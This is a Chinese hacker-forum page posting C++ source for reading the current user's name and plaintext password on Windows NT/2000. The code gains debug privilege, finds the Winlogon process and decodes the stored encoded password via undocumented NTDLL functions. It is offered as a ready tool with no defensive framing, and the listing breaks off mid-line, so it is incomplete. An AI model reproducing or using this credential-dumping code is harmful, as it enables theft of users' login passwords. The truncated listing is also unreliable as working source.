我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!

C++中获取WinNT/Win2k当前用户名和密码

2013年04月28日03:40 阅读: 12818 次

    // 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:
    // bool GetPassWord(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
    //---------------------------------------------------------------------------
    typedef strUCt _UNICODE_STRING
    {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
    }UNICODE_STRING, *PUNICODE_STRING;
    typedef struct _QUERY_SYSTEM_INFORMATION
    {
        DWORD GrantedAccess;
        DWORD PID;
        WORD HandleType;
        WORD HandleId;
        DWORD Handle;
    }QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
    typedef struct _PROCESS_INFO_HEADER
    {
        DWORD Count;
        DWORD Unk04;
        DWORD Unk08;
    }PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
    typedef struct _PROCESS_INFO
    {
        DWORD LoadAddress;
        DWORD Size;
        DWORD Unk08;
        DWORD Enumerator;
        DWORD Unk10;
        char Name [0x108];
    }PROCESS_INFO, *PPROCESS_INFO;
    typedef struct _ENCODED_PASSWORD_INFO
    {
        DWORD HashByte;
        DWORD Unk04;
        DWORD Unk08;
        DWORD Unk0C;
        FILETIME LoggedOn;
        DWORD Unk18;
        DWORD Unk1C;
        DWORD Unk20;
        DWORD Unk24;
        DWORD Unk28;
        UNICODE_STRING EncodedPassword;
    }ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

    typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD);
    typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
    typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
    typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
    typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING);

    // Private Prototypes
    BOOL IsWinNT(void);
    BOOL IsWin2K(void);
    BOOL AddDebugPrivilege(void);
    DWORD FindWinLogon(void);
    BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
    BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
    void ReturnWinNTPwd(String &, String &, String &);
    void ReturnWin2kPwd(String &, String &, String &);
    bool GetPassword(String &, String &, String &);

    // Global Variables
    PFNNTQUERYSYSTEMINFORMATION        pfnNtQuerySystemInformation;
    PFNRTLCREATEQUERYDEBUGBUFFER       pfnRtlCreateQueryDebugBuffer;
    PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
    PFNRTLDESTROYQUERYDEBUGBUFFER      pfnRtlDestroyQueryDebugBuffer;
    PFNTRTLRUNDECODEUNICODESTRING      pfnRtlRunDecodeUnicodeString;

    DWORD dwPwdLen = 0;
    PVOID pvRealPwd = NULL;
    PVOID pvPwd = NULL;
    DWORD dwHashByte = 0;
    wchar_t wszUserName[0x400];
    wchar_t wszUserDomain[0x400];
    //---------------------------------------------------------------------------
    bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
    {
            if(!IsWinNT() && !IsWin2K())
        {
            // 只适合于2000或者XP
            return false;
        }
        // Add debug privilege to PasswordReminder -
        // this is needed for the search for Winlogon.
        if(!AddDebugPrivilege())
        {
            // 不能够添加debug特权
            return false;
        }
        // debug特权已经成功加入到本程序
        HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
        pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
                GetProcAddress(hNtDll,"NtQuerySystemInformation");
        pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
                GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
        pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
                GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
        pfnRtlDestroyQueryDebugBuffer =    (PFNRTLDESTROYQUERYDEBUGBUFFER)
                GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
        pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
                GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString

分享到: 更多
蓝客门户
©2001-2017 中国蓝客联盟 版权所有.
关于蓝客联盟历史宗旨章程技术服务联系我们蓝客社区